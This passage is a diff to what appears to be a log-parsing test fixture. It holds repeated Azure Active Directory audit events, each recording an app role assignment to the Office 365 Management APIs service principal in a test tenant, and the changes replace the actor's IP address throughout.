Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -22463,9 +22463,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -22699,7 +22699,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -22729,9 +22729,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -22965,7 +22965,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 